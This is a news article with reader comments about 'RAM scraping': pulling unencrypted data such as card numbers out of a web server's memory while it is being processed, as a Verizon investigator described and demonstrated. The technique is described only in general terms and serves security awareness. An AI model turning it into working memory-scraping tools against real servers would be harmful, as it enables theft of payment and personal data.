How hackers scrape RAM to circumvent encryption

How hackers scrape RAM to circumvent encryption

Summary: Encryption might protect data while in transit and at rest, but most organisations don't realise that while data is being processed, it's still vulnerable, according to Verizon


Speaking at the company's media day forum in Singapore yesterday, Verizon Business Investigative Response managing principal Mark Goudie said that the various encryption standards today do a good job of protecting data that is at rest, such as data stored on a server or in transit across a network. But in many cases, data is left completely vulnerable during the processing stage.

"It's hard to process encrypted data. If you want to process the data, you need it unencrypted. We all know that, [but] so do the bad guys."

This has opened up servers to attack by a technique that Goudie calls RAM scraping, which examines the memory of the running web server and extracts data while it is in its processed, unencrypted state.

"If I can do it, and I'm a bad programmer ... professionals can do it far better than I can."

Goudie believes that the technique has been in use for several years, dating back to 2008, but that many organisations are simply unaware and assume that because data is encrypted at rest and in transit, the security of the information is foolproof.

"This is what I hear all the time: 'We could not have possibly been hacked, because we don't store any sensitive data, we just send it off to somebody else.'"

Goudie demonstrated the attack to journalists, using a fictitious e-commerce site that never stores credit card information — a practice that many retailers do when they take payment details and pass them on to a third-party payment processor.

However, the web server must handle the information during processing, and it is here that it appears in the memory of the server in its unencrypted form, allowing Goudie to retrieve the information.

"I grabbed the processes, I found where the memory locations were, I got the memory locations, and I looked through it."

Goudie said that while this demonstrated how easy it is to farm credit card numbers, this is just one application of how RAM scraping could be used.

"I'm not just talking about credit card numbers. Credit card numbers are just the most prolific and obvious examples. Any data that you can make a regular expression out of, like a name or an address, all these things are things you can search for [and] anything that you can search for and find can be pulled out."

Michael Lee travelled to Singapore as a guest of Verizon Enterprise Solutions.

Topics: Security, E-Commerce, Malware, Verizon

Michael Lee

About Michael Lee

A Sydney, Australia-based journalist, Michael Lee covers a gamut of news in the technology space including information security, state Government initiatives, and local startups.

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.


Log in or register to join the discussion
  • RAM computer forensics

    Our team has developed and is offering for free RAM extraction tools working in Windows - - both are free (as in Beer and as in Speech) - we thought sharing back to the community is a good idea.
    Alexander Sverdlov
    • Do you mind if I share this on LinkedIn?

      This is useful info and could help a company in the cybersecurity arms race. Would it be OK to share this? Either way, I wouldn't share your name unless you also OK that as well.

      Please let me know.

      Thank you!

      Darren Singleton, CISSP CISA
  • yes and no

    You have to hijack the web server and that is not unusual, especially for a smaller company that is running just one box or doing all the heavy lifting on just the web server instance.

    Does this work if you are using an external DLL call to handle the encryption? It seems it would if you scanned all the ram and knew what you were looking for. I was thinking that you could pass the data to another OS partition that didn't share ram (sandbox/virtual servers), but I don't know if that is possible. The incoming (to the web server) data is still exposed as the web server/page handles the data though so I don't guess my idea has merit. What do you guys think?

    Can you encrypt it at the user end before it is sent back to the web server? Is that practical?
    • Solve the problem, not the symptoms

      As I understand it, the technique uses any running process on the machine. The webserver was the obvious choice in this case, but handing it off to another process or server would not circumvent an attack and would simply open up an additional avenue for attack once the data clears the webserver process.

      Client-side encryption opens up another host of problems such as the server having no way of doing even simple checks like that the credit card is in the correct format, and has to rely on the client not being compromised.

      The easiest and proper thing to do is to actually secure the webserver.


      Michael Lee (Mukimu)
  • Not a Huge Revelation

    To recap, a hacker who can compromise a server can also compromise the encryption/decryption mechanisms on that server.

    I'm no security expert, but even I knew that. I wish ZDNet was a little more investigative, and they tried to figure out how widespread this lack of knowledge is.
    • Goudie hears it all the time

      As Goudie mentions, he's hearing from misinformed companies all the time. There's no formal stats from the company of awareness, but I can give you an idea of how widespread the attacks are.

      Verizon touched on RAM scraping in this year's Data Breach Investigation Report earlier this year ( About 2 percent of malware infecting all organisations uses RAM scraping. This number rises to 6 percent if it is a large organisation.

      Hope that helps! =)

      Michael Lee (Mukimu)
  • RAM Scraping

    I am not a programmer, so I don't know a lot about hacking and stealing, but years ago, I saw some encryption software that was for emailing and other uses that would encrypt a document and self decrypt when opened by the recipient. will RAM Scraping circumvent that too??
    • Yes.

      "Ram Scraping" is a very old technique and is just running a process to find RAM areas to access on a processor/OS that has no process security that traps access to areas of RAM that a given process does not own. Since few folks have such security, it'll work on any PC or OS out there.
  • A physical world analogy

    An analogy in the physical world would be if you received sealed transactions, opened them in the same room in which you process them, and then sealed the replies before sending them on, while shredding the worksheets. You would be fine unless someone managed to install a camera in the ceiling over your worktable!

    Basically then, if the hacker can get one of these processes working on your server that can report back to its master, it's just like a camera in the ceiling over a clerk's desk. The way to stop it is to prevent the "camera" from being installed.